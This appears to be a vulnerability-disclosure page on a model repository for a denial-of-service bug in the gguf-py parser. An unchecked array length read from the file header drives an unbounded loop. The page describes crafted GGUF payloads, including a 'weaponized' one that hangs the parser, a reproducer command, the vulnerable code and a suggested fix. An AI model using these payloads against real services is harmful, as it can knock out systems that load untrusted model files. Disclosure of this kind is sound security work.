You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

GGUF MFV: Unbounded array-length DoS in `gguf-py` Python parser

huntr Model Format Vulnerability submission. Tier-1 MFV ($4,000).

This repository holds the proof-of-concept GGUF payloads and reproducer script for an unbounded array-length DoS in the canonical Python GGUF parser (gguf-py, shipped as PyPI gguf, maintained at ggml-org/llama.cpp).

Bug class

CWE-400 (Uncontrolled Resource Consumption) / CWE-789 (Memory Allocation with Excessive Size Value).

gguf-py/gguf/gguf_reader.py:239-255 reads a UINT64 alen from the GGUF file header and uses it directly as the loop bound when parsing array-typed metadata fields. No upper cap, no file-size consistency check. The C++ sibling parser in the same repository (ggml/src/gguf.cpp:270) DOES enforce GGUF_MAX_ARRAY_ELEMENTS = 1GB — that protection was not propagated to the Python parser.

Payloads in this repo

File	Size	Declared `alen`	Observed parse time (Python 3.13)
`array_len_10000.gguf`	56 bytes	10,000	0.05s
`array_len_100000.gguf`	56 bytes	100,000	0.42s
`array_len_1000000.gguf`	56 bytes	1,000,000	9.15s
`malicious_array_len.gguf`	56 bytes	weaponized value	parser hangs effectively forever
`kv_count_10000.gguf`	47 bytes	10,000 (kv_count branch)	sibling primitive
`kv_count_100000.gguf`	47 bytes	100,000 (kv_count branch)	sibling primitive
`kv_count_1000000.gguf`	47 bytes	1,000,000 (kv_count branch)	sibling primitive

Linear scaling at ~10 us/iter. Extrapolation:

`alen`	Parse time
10^7	~91 s
10^8	~15 min
10^9 (matches the C++ sibling cap)	~2.5 hours
10^12	~110 days
2^64 - 1 (UINT64 max)	~5.8 million years

Reproducer

pip install gguf
python poc_gguf_py_array_length_dos.py

The script builds minimal 56-byte GGUF files with varying declared alen, then times the parse via gguf.GGUFReader(path). Linear scaling confirms the unbounded loop. Replay with kv_count_*.gguf against the _build_fields / _build_tensor_info loops at line 165 for the sibling primitive.

Sink (verbatim)

llama.cpp/gguf-py/gguf/gguf_reader.py:239-255:

if gtype == GGUFValueType.ARRAY:
    raw_itype = self._get(offs, np.uint32)
    offs += int(raw_itype.nbytes)
    alen = self._get(offs, np.uint64)               # attacker-controlled length
    offs += int(alen.nbytes)
    aparts: list[npt.NDArray[Any]] = [raw_itype, alen]
    data_idxs: list[int] = []
    for idx in range(alen[0]):                       # unbounded iteration
        curr_size, curr_parts, curr_idxs, curr_types = self._get_field_parts(offs, raw_itype[0])
        if idx == 0:
            types += curr_types
        idxs_offs = len(aparts)
        aparts += curr_parts                         # list growth per iter
        data_idxs += (idx + idxs_offs for idx in curr_idxs)
        offs += curr_size
    return offs - orig_offs, aparts, data_idxs, types

Suggested fix

Mirror the C++ cap:

GGUF_MAX_ARRAY_ELEMENTS = 1024 * 1024 * 1024   # 1 GiB element cap
GGUF_MAX_STRING_LENGTH  = 1024 * 1024 * 1024   # 1 GiB string cap

if int(alen[0]) > GGUF_MAX_ARRAY_ELEMENTS:
    raise ValueError(f"GGUF array length {alen[0]} exceeds max {GGUF_MAX_ARRAY_ELEMENTS}")

Same protections needed for tensor_count and kv_count reads at line 165.

Disclosure status

Submitted to huntr as a Tier-1 Model Format Vulnerability against the GGUF format. Sibling-class to this researcher's prior 6 MFV memory-amplification findings on npy / npz / messagepack / pickle / parquet / onnx (May 2026), same primitive class.

The maintainer ggml-org/llama.cpp is being notified through the huntr disclosure flow.

Downloads last month: -

GGUF

Model size

0 params

Architecture

Hardware compatibility

We're not able to determine the quantization variants.

View all variants

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support